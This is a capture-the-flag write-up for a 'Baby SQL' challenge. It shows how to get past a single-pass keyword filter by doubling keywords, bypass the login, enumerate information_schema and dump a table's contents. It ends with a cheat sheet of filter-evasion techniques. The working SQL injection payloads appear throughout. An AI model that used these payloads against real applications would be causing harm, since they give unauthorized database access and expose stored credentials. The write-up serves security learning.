0x01 Subject
Baby SQL
=> SQL injection
0x02 Mind Palace
The hint says => strict filtering is in place => so the key is (probably) bypassing the filter
/check.php?username=xxx&password=xxx
Guessed backend query: select x,x from table where username = 'xxx' and password = 'xxx'
payload = /check.php?username=root%27+or+1%3D1%3B%23&password=root
But it feels like either the comment character or the and/or keywords are being filtered
=> root%27+or+1%3D1%3B%23
| root' or 1=1;#
Assume it is "or" that is filtered; try URL-encoding it as %6f%72
=> root%27+%6f%72+1%3D1%3B%23
| root' or 1=1;#
Response: syntax error near 1=1;#'
That means "or" was removed from the query (URL-encoding it as %6f%72 did not help, because the server decodes the parameter before the filter runs), while the # survived.
So maybe ; / or / # is being filtered?
=> root%27/**/%6f%72/**/1%3D1%3B%23
=> root%27/**/oorr/**/1%3D1%3B%23
=> root%27%2520oorr%25201%3D1%3B%23
| root'%20oorr%201=1;#
Response: Unknown column '20or' in 'where clause'
Looks like something interesting just turned up, hmm
There is definitely a filter, but the oorr bypass seems to work: the inner "or" was stripped and the outer halves closed up into "or" again. (The double-encoded %2520 was decoded only once, so %20or reached MySQL, which read % as the modulo operator and 20or as a column name, hence the error.)
Since the above was done by editing captured requests, let's try it directly in the login form
username = root' oorr 1=1;#
payload => /check.php?username=root%27+oorr+1%3D1%3B%23&password=root
Bypass successful
Find the number of columns
/check.php?username=admin' order by 3%23&password=1
Response: error
Guess that "by" is filtered too; replace it with bbyy (and "order", which contains "or", becomes oorrder)
username = admin' oorrder bbyy 3#
=> Login Success
username = admin' oorrder bbyy 4#
=> Error
So the table has three columns
Next step: find which columns are echoed back
username = admin' union select 1,2,3
=> Error, there is a filter to get around
UnIon SeLEcT fails as well (the filter is case-insensitive) => keep splicing strings => ununionion selselectect
username => 9' ununionion selselectect 1,2,3#   (9 is a nonexistent user, so the row displayed is the one from the union)
Columns 2 and 3 are echoed, so they can serve as display points
username => 9' ununionion selselectect 1,database(),version()#
=> database_name = geek
Next step: use information_schema.tables
to enumerate the tables
username => 9' ununionion selselectect 999,999,group_concat(table_name) from information_schema.tables where table_schema=geek#
=> Error
Are from and where filtered as well? Try both
from => frfromom; where => whwhereere
information_schema got mangled too... oh, it contains "or" as well (inf-or-mation), so it has to be written infoorrmation_schema. (The unquoted geek above is a problem too: quote it as 'geek' or use database() instead.)
username = 9' ununionion selselectect 999,999,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database()#
/check.php?username=9%27+ununionion+selselectect+999%2C999%2Cgroup_concat%28table_name%29+frfromom+infoorrmation_schema.tables+whwhereere+table_schema%3D'geek'%23&password=1
Among the tables returned, b4bsql is the obvious guess for where the flag lives
=> enumerate its column_name values
username = 9' ununionion selselectect 999,999,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_schema=database() anandd table_name='b4bsql'#
(ugh, "and" needs bypassing too, hence anandd)
Then dump the data from those three columns
username = 9' ununionion selselectect 999,999,group_concat(id,username,passwoorrd) frfromom b4bsql#
(ugh, an error almost always means something was not bypassed; don't forget that "password" contains "or" and must be written passwoorrd)
Got the flag
0x03 Look Ahead
A short summary
- The hint says the SQL injection is strictly filtered; by experimenting, the bypass turned out to be hiding characters (double-writing each filtered keyword so that one removal pass reassembles it)
- The login bypass returns a username and password directly, but nothing useful
- The order by error reveals the column count: username =
admin' oorrder bbyy 4#
- Find the echo points: username =>
9' ununionion selselectect 1,2,3#
- Get basic database info: username =>
9' ununionion selselectect 1,database(),version()#
- Enumerate table_name and column_names through the information_schema database
- username =
9' ununionion selselectect 999,999,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database()#
- username =
9' ununionion selselectect 999,999,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_schema=database() anandd table_name='b4bsql'#
- Then fetch the data using the known column_names
- username =
9' ununionion selselectect 999,999,group_concat(id,username,passwoorrd) frfromom b4bsql#
Potential ways to get around a filter
IF spaces and comment markers such as --+ are filtered
Replace the space with a block comment /**/, a pair of parentheses, a newline, or a plus sign (in a URL query string, + is decoded to a space by the server)
IF specific keywords are filtered
0x01 Change the case
and => AnD
or => Or oR OR
(only works against a case-sensitive filter; in this challenge UnIon SeLEcT was still caught)
0x02 Change the encoding
URL-encode the keyword: take the character's hex ASCII code and replace the 0x with %, e.g. 'o' is 0x6f, so its URL encoding is %6f
(only helps when the filter runs before decoding; PHP decodes $_GET before the script sees it, which is why %6f%72 still lost its "or" above, and double encoding such as %2520 reaches the query as a literal %20 rather than a space)
0x03 Insert comments
select => sel/**/ect
and => a/**/nd
(MySQL ignores the /**/ inside the SQL while the filter no longer sees the whole word; fails if the filter strips comments first)
0x04 Hide characters
select => selselectect
and => anandd
(works against a filter that removes each keyword in a single pass: the inner copy is removed and the outer halves close up; a filter that repeats until nothing changes defeats this)
0x05 Use symbols
and => &&
or => ||
IF digits are filtered
0x01 Change the data type
1 => 1.0
3 => 3.0
IF comparison operators are filtered
>
<
=> greatest() least()
=> where greatest(ascii(substr(database(),1,1)),64)=64
(true when the ASCII code of the first character of the database name is at most 64; note that MySQL substr() positions start at 1, and substr(...,0,1) returns an empty string)
References:
https://blog.csdn.net/weixin_40950781/article/details/100061268
https://www.cnblogs.com/peterpan0707007/p/7501507.html
https://blog.csdn.net/qq_45521281/article/details/105533626
END(¯﹃¯)